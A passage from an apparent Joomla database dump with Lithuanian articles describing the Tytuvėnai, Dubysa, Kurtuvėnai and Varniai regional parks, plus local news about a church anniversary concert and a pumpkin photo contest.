ežeringą apylinkių kraštovaizdį, senovinius Šiluvos ir Tytuvėnų urbanistinius paminklus, savitą gamtą bei kultūros paveldo vertybes.</p>\r\n<p style=\"text-align: left;\">Regioninio parko teritorija išsidėsčiusi Kelmės, Raseinių ir Radviliškio rajonų sandūroje. Beveik 60 % parko teritorijos užima draustiniai: teritorijos, kuriose apsaugos režimas yra sugriežtintas. Sunkiai įžengiamiems, pelkėtiems miškams apsaugoti įsteigtas Užpelkių gamtinis rezervatas.</p>\r\n<p style=\"text-align: left;\"><strong>Dviračių trasa</strong></p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">Aplink Giliaus ir Bridvaišio ežerus nutiesta 13,5 km ilgio dviračių trasa, kuria važiuojant galima pamatyti gražiausius apylinkių kraštovaizdžius, susipažinti su įdomiais lankomais objektais, apylinkes apžvelgti nuo bokšto.</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">Aplink Giliaus ežerą įrengtas pažintinis takas, keliaujantiems atveriantis savitą paežerių gamtą. Ypač daug lankytojų sulaukia Tytuvėnų bažnyčios vienuolyno ansamblis ir Šiluva – Švč. Mergelės Marijos apsireiškimo vieta.</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\"><strong>Kraštovaizdis</strong></p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">Unikalus kraštovaizdis, gaivus ežerų vanduo bei apylinkių istoriją menantys kultūros objektai sudomins tiek aktyvaus, tiek pasyvaus poilsio mėgėjus. Skaidrus ežerų vanduo, kur galima vėją gaudyti burlente, paplaukioti valtimis ar vandens dviračiais ar, nutaikius dienelę, ramiai pažvejoti. Po apylinkes pasižvalgyti galima ir pėsčiomis, ir dviračiais, ir automobiliu.</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\"><strong>Maršrutai ir ekskursijos</strong></p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">Tytuvėnų regioninio parko direkcija lankytojams rekomenduoja įvairias pažintines ekskursijas, teikia gido paslaugas:</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">1. Tytuvėnų dviračių trasa. Jos ilgis 13,5 km. Trasos ilgis aplink Giliaus ežerą 5 km, o aplink Bridvaišį 6,5 km. Tytuvėnų miesto gatvėmis trasa vingiuoja apie 2 km. Keliaujant galima susipažinti su svarbiausiais Tytuvėnų krašto kultūros ir gamtos objektais bei pasigrožėti vaizdingomis krašto apylinkėmis.</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">2. Giliaus ežero pažintinis takas. Su Giliaus ežeru ir pakrantėmis susipažinsite keliaudami 3,3 km ilgio pažintiniu taku. Trumpo poilsio pakvies įrengti Giliaus ežero pliažai ir atokvėpio vietos. Keliaujant pažintiniu taku plačiau susipažinti su ežero gyvūnijos ir augalijos įvairove padės informaciniai stendai. Nuo apžvalgos bokštelio atsiveria vaizdas į ežerą bei unikalią „kabančią“ pelkę.</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">3. Susipažinimo su parku maršrutas. Kelias vingiuoja pro Tytuvėnų ir Šiluvos miestelius, siekia senąsias Roglaičių kaimo kapines, Akmenės bei Rinkšelių akmenis, buvusią Pašakarnio dvaro sodybą ir pro Kokmaniškės kalną sugrįžta atgal į Tytuvėnų miestelį. Bendras trasos ilgis – 28 km. Tai puiki galimybė susipažinti su miesteliais, apylinkių kraštovaizdžiu. Pakilę ant Kokmaniškės kalno ir užkopę į apžvalgos bokštą, galėsite pasigėrėti apylinkių vaizdais.</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">4. Maršrutas automobiliais ir pėsčiomis po Tytuvėnų miestelį ir jo apylinkes (tiems, kas nori greitai ir daug pamatyti). Keliaudami šiuo maršrutu, kuris trunka apie 2 valandas, trumpai susipažinsite su Giliaus ežero pažintiniame take esančiomis gamtos vertybėmis, Apušio ežeru, Miško muziejumi, Tytuvėnų bažnyčios ir vienuolyno ansambliu, pasigrožėsite Tytuvėnų apylinkėmis nuo 15 m aukščio apžvalgos bokšto, užlipsite ant Bridvaišio piliakalnio.</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">5. Miško muziejus. Čia įrengtos ekspozijos lankytojus supažindina su šio krašto fauna, liaudies meistrų kūryba, regioninio parko reljefu.</p>\r\n<p class=\"pjusttify\" style=\"text-align: left;\">6. Paukščių stebėjimas. Rudenį buvusiuose durpynuose ir gretimuose laukuose susirenka tūkstančiai gervių. Vakare jos skrenda į atviras vietas durpynuose. Tai pats geriausias laikas pasigrožėti šiais paukščiais.</p>\r\n<p><strong>Tytuvėnų regioninio parko lankytojų centras</strong></p>\r\n<p> Miško g. 3, Tytuvėnai, Kelmės r.</p>\r\n<p> Tel./faks. (8 427) 59 031</p>\r\n<p> El. paštas tytuvenurp@trp.lt</p>\r\n<p> Internetinė svetainė www.trp.lt</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,52,'2014-06-04 19:54:04',135,'','2014-06-04 20:00:50',135,0,'0000-00-00 00:00:00','2014-06-04 19:54:04','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,5,'','',1,9636,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(201,288,'Dubysos regioninis parkas','dubysos-regioninis-parkas','','<table class=\"renderedtable\" style=\"width: 100%;\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/dubysos_regioninis_parkas/{/gallery}</td>\r\n<td valign=\"top\">\r\n<p class=\"pjusttify\"><strong>Apie parką</strong></p>\r\n<p class=\"pjusttify\">Dubysa – viena vaizdingiausių Lietuvos upių, 14-a pagal ilgį (138,9 km). Parko teritorija upė vingiuoja 65 km. Parko teritorija priskiriama Raseinių ir Kelmės rajonams. Visą parko plotą sudaro draustiniai, net du iš jų – Lyduvėnų ir Betygalos – saugo kraštovaizdį. Geriausias būdas išvysti parką – plaukti baidare ar valtele nuo Maironių kaimo (65 km maršrutas, 1–2 d. žygis) bei atvykus į Lyduvėnus, Betygalą, pakeliauti pėsčiomis po apylinkes. Turistai automobiliu parko įžymybes aplankytų per dieną, bet išsamesnį vaizdą apie saugomas gamtos ir kultūros vertybes galima susidaryti tik žygiuose su patyrusiais parko direkcijos specialistais.</p>\r\n<p><strong>Vandens turizmas</strong></p>\r\n<p><span>Dubysa – viena gražiausių Lietuvos upių bei populiariausių vandens turizmo trasų. Dubysos upė Dubysos regioninio parko teritorijoje vingiuoja 65 km. Dubysos vandens turizmo trasa (ilgis – 35 km).</span></p>\r\n<p>Vaizdingas stačiašlaitis Dubysos senslėnis, pakrantėse rymantys piliakalniai, natūralios salpinės pievos, šlaitais srūvančių intakų gurgenimas, apsistoti tinkamos stovyklavietės ir kaimo turizmo sodybos sukuria poilsiui tinkamą atmosferą. Dubysos slėnis yra vienas iš raiškingiausių ir vaizdingiausių upės erozinio slėnio pavyzdžių Lietuvoje. Vidutinio sraunumo, duburiuota upė tinka bičiulių žygiams ir šeimyniniam turizmui. </p>\r\n<p>Įrengtos stovyklavietė ir poilsiavietės su pavėsinėmis, laužavietėmis, gėlu vandeniu ir kt. infrastruktūra, trasoje pastatytos informacinės rodyklės. Trasoje esančiose stovyklavietėse ir poilsiavietėse patogu pradėti ar baigti kelionę upe: lėkšti Dubysos krantai, geras privažiavimas, yra automobilių stovėjimo aikštelės. Vandens turistams stovyklavietes nurodo specialūs ženklai. </p>\r\n<p>Dubysos regioninio parko direkcija<br /> Dominikonų g. 2A, LT-60169, Raseiniai<br /> Tel. / faks. (8 428) 70 330<br /> El. paštas <a href=\"mailto:dubysosrp@raseiniai.lt\">dubysosrp@raseiniai.lt</a><br /> Internetinė svetainė <a href=\"http://www.dubysa.info\">http://www.dubysa.info</a></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,52,'2014-06-04 20:02:21',135,'','2018-06-12 12:18:42',135,0,'0000-00-00 00:00:00','2014-06-04 20:02:21','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,4,'','',1,8996,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(202,289,'Kurtuvėnų regioninis parkas','kurtuvenu-regioninis-parkas','','<table class=\"renderedtable\" style=\"width: 100%;\" border=\"0\" cellspacing=\"2\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kurtuvenu_regioninis_parkas/{/gallery}</td>\r\n<td valign=\"top\">\r\n<p class=\"pjusttify\"><strong>Apie parką<br /> </strong>Kurtuvėnų regioninis parkas plyti Rytų Žemaičių aukštumos pakraštyje, Ventos ir Dubysos upių takoskyroje, Šiaulių ir Kelmės rajonuose. Šiaurės pietų kryptimi driekiasi trys mišku apaugę kalvagūbriai, atskirti kloniais ir ežerų duburiais. <br />Reljefo išraiškingumą paįvairina termokarstinės duobės, ozai, žemyninės kopos, stačiašlaitės kalvos, raguvynai, kanjoniniai kloniai. <br />Vertingiausi gamtiniai kompleksai saugomi 17-oje draustinių.</p>\r\n<p class=\"pjusttify\"><strong>Kultūros ir gamtos vertybės<br /> </strong>Svarbiausios gamtos vertybės: Šaukėnų–Kurtuvėnų miškų masyvas, Pageluvio ežerynas (10 ežerų), vaizdingas Dubysos slėnis, Ilgos pelkynai. Vakarinėje parko dalyje trykšta didžiausi Lietuvoje Svilės šaltiniai – 1,8 ha plote „verda“ daugiau kaip šimtas įvairaus dydžio „akių“.<br /><br /> Svarbiausios kultūros paveldo vertybės: Dubysos–Ventos perkaso hidrosistema, Dengtilčio ir Mirskiškės vandens malūnai, Kurtuvėnų, Bubių, Gelučių, Žadvainių dvarų sodybos, barokinė Kurtuvėnų Šv. Apaštalo Jokūbo bažnyčia, V. Pūtvio-Putvinskio memorialinė sodyba Šilo Pavėžupyje, Vainagių, Galvydiškės, Gaidžiapilio, Kurtuvėnų, Bakausių piliakalniai.Galimybės poilsiauti. <br /><br /> Kurtuvėnų regioniniame parke poilsiui skirtos 7 rekreacinės zonos: Bubių, Geluvos, Bijotės, Padubysių, Pašvinio, Šonos ir Vėžežerio.Populiariausi yra Geluvos ir Bijotės ežerų paplūdimiai. <br /><br /> Gražiausias regioninio parko lankytinas vietas galima apžiūrėti keliaujant parko schemoje pažymėta dviračių-autoturizmo trasa. <br /><br />Dviračių takas (17 km) nutiestas nuo Šiaulių iki Kurtuvėnų. Kurtuvėnuose dviračius galima išsinuomoti. Pėstiesiems įrengtas pažintinis takas (4,5 km) aplink Juodlės ežerą. <br /><br />Parko svečiai gali apsistoti buvusioje Kurtuvėnų dvaro sodyboje įrengtoje stovyklavietėje, kaimo turizmo sodybose, poilsiavietėse.<strong><br /></strong></p>\r\n<p><strong>Kurtuvėnų regioninio parko direkcija</strong></p>\r\n<p>Parko g. 2, Kurtuvėnai, LT-80223 Šiaulių r.</p>\r\n<p>Tel. (8 41) 37 0333</p>\r\n<p>El. paštas <a href=\"http://www.kelme.lt/\" target=\"_self\">info@kurtuva.lt</a></p>\r\n<p>Internetinė svetainė <a href=\"http://kurtuva.lt/\" target=\"_self\">www.kurtuva.lt</a></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,52,'2014-06-04 20:08:13',135,'','2014-06-04 20:11:52',135,0,'0000-00-00 00:00:00','2014-06-04 20:08:13','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,3,'','',1,9089,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(203,290,'Varnių regioninis parkas','varniu-regioninis-parkas','','<table class=\"renderedtable\" style=\"width: 100%;\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/varniu_regioninis_parkas/{/gallery}</td>\r\n<td valign=\"top\">\r\n<p class=\"pjusttify\"><strong>Apie parką</strong></p>\r\n<p class=\"pjusttify\">Įsteigtas 1992 m. Regioninio parko teritorija užima 33 508 ha plotą, buferinės apsaugos zona – 16 881 ha. Parko teritorija priskiriama Telšių, Šilalės ir Kelmės rajonams.</p>\r\n<p><strong> Gamtos vertybės</strong></p>\r\n<p> Didžiausias natūralus Žemaitijos ežeras – Lūkstas, garsėjantis gintaru. Parko      teritorijoje prasideda didžiosios Žemaitijos upės: Minija, Virvytė, Venta, Kražantė,  Akmena.</p>\r\n<p>Varnių regioninio parko kraštovaizdžio savitumą lemia unikalūs ežerai,  daugybė pelkių, pasižyminčių gausia biologine įvairove bei ledynmečių paliktos  keiminių plokščiakalvių „kepurės“, nuo kurių atsiskleidžia Žemaitijos kraštovaizdžio  grožis, saviti ir unikalūs Varnių ir Luokės urbanistiniai kompleksai.</p>\r\n<p class=\"pjusttify\"> Ypatingu raiškumu pasižymi Šatrijos moreninis masyvas. Šatrijos kalnas iš aplinkos išsiskiria didžiausiu Lietuvoje  santykiniu aukščiu. Sakoma, jog Šatrija – kiekvienam lietuviui iškiliausias kalnas.</p>\r\n<p class=\"pjusttify\"> Archeologų manymu, kalvos viršuje yra stovėjusi medinė pilis, o pašlaitėje žmonės    gyveno jau nuo II a. prieš Kristų. Manoma, kad čia buvo vienas svarbiausių senojo l  lietuvių tikėjimo centrų, sunaikintų įvedus Žemaitijoje krikščionybę.</p>\r\n<p class=\"pjusttify\">Nuo Šatrijos matai  neaprėpiamai plačią ir šviesią kalvotą žemę – net plika akimi įžiūrimas už 35 km  stūksantis Medvėgalis, kiek arčiau esantys kiti Žemaitijos milžinai: Girgždūtė, Moteraitis,  Sprūdė. Taip pat matyti Luokė, Viekšnaliai, Upyna, Gaulėnai, Užventis, baltumu  šviečiantys Telšių katedros, buvusios Varnių kunigų seminarijos bokštai. </p>\r\n<p><strong> Varnių regioninio parko direkcija</strong></p>\r\n<p> Ožtakių kaimas, Varnių seniūnija, Telšių r.</p>\r\n<p> Tel. / faks. 8 444 47 415</p>\r\n<p> El. p. <a href=\"http://www.kelme.lt/\" target=\"_self\">varniu-rp@takas.lt, </a></p>\r\n<p> Internetinė svetainė <a href=\"http://www.varniuparkas.lt/\" target=\"_self\">www.varniuparkas.lt</a></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,52,'2014-06-04 20:12:54',135,'','2014-06-04 20:16:06',135,0,'0000-00-00 00:00:00','2014-06-04 20:12:54','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,2,'','',1,8074,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(214,302,'Nuskambėjo paskutiniai muzikos akordai','nuskambejo-paskutiniai-muzikos-akordai-skirti-tytuvenu-baznycios-ir-vienuolyno-400-metu-jubiliejui-pamineti','','<p style=\"text-align: justify;\"><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Spalio 4 dieną visus kvietėme dar kartą prisiminti mūsų įstabaus Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir  bernardinų vienuolyno ansamblio 400 metų sukaktį. Koncerte ,,Dėkingumas‘‘ dalyvavo Mindaugas Jankauskas, Barbora Domarkaitė, Miglė Dikšaitienė, Dalia Jatautaitė. Skambėjo įžymių kompozitorių V. Bertulio, J. S. Bach., G. F. Hȁndel, Fr. Durante, J. Wiegand kūriniai.</span></p>\r\n','\r\n<p><strong><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica,Arial,\'lucida grande\',tahoma,verdana,arial,sans-serif; font-size: 14px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 20px; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; display: inline ! important; float: none; background-color: #ffffff;\">Kad ir ką veiktume, kad ir kokios būtų aplinkybės, visada yra laiko padėkoti. J.Robert Moskin</span></strong></p>\r\n<p style=\"text-align: justify;\"><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dėkojame Tytuvėnų bažnyčios ir vienuolyno ansamblio fundatoriui A. Valavičiui, jo broliams Jeronimui, Pauliui, Eustachijui, kurie tęsė Andriejaus Valavičiaus darbus ir baigė statyti šį gražų ansamblį, statybų vadovui Tomui Kasparui, vienuoliams bernardinams, kurie gyveno, rūpinosi ansambliu, uoliems parapijiečiams ir Žemaičių vyskupui Motiejui Valavičiui, kurių pastangomis pavyko išsaugoti bažnyčią po 1863 m. sukilimo, dėkojame visiems visiems prisidedantiems prie šio nuostabaus turto išsaugojimo, atgaivinimo.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/paskutiniai_akordai/004.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/paskutiniai_akordai/008.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/paskutiniai_akordai/017.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p style=\"text-align: justify;\"><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šias metais skirta daug renginių  Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir  bernardinų vienuolyno ansamblio 400 metų jubiliejui paminėti. VšĮ ,,Tytuvėnų piligrimų centras‘‘ dėka Lietuvos Kultūros tarybos ir Kelmės rajono savivaldybės, kurie skyrė finansavimą projektams, suorganizavo tris koncertus,  išleido leidinį „Tytuvėnų ansambliui 400 metų“, skrajučių, plakatų, lankstinukų- rusų, lenkų, lietuvių kalbomis.</span></p>\r\n<p style=\"text-align: justify;\"><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų Švč. Mergelės Marijos Angelų karalienės parapijos užsakymu išleista knyga ,,Tytuvėnų bažnyčia ir vienuolynas 400 metų‘‘, kun. klebono Rimanto Žaromskio  iniciatyva pastatytas ir pašventintas naujas bažnyčios altorius.</span></p>\r\n<p style=\"text-align: justify;\"><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VŠĮ ,,Tytuvėnų festivalis‘‘ surengė ne vieną koncertą skirtą Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios ir  bernardinų vienuolyno ansamblio 400 metų jubiliejui paminėti.</span></p>',1,0,0,44,'2014-10-09 06:50:19',135,'','2014-10-09 06:51:45',135,135,'2014-10-09 06:51:45','2014-10-09 06:50:19','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/paskutiniai_akordai\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,157,'','',1,3733,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(215,303,'Moliūgų fotografijos','moliugu-fotografijos','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">DĖMESIO!<br />Nufotografuokite įspūdingiausią savo moliūgą arba nusifotografuokite kartu su jo ir siųskite nuotraukas iki spalio 22 d. adresu: info@infotytuvenai.lt</span></p>\r\n','\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/moliugai/didele.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2014-10-17 06:38:51',135,'','2014-10-17 06:39:53',135,135,'2014-10-17 06:39:53','2014-10-17 06:38:51','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/moliugai\\/maza.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,156,'','',1,3742,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(228,316,'Maldos pusryčiai Tytuvėnuose','maldos-pusryciai-tytuvenuose','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Ankstų  Kovo 11 – osios  rytą, miestelėnai rinkosi į Tytuvėnų bernardinų vienuolyną. Lietuvos Nepriklausomybės 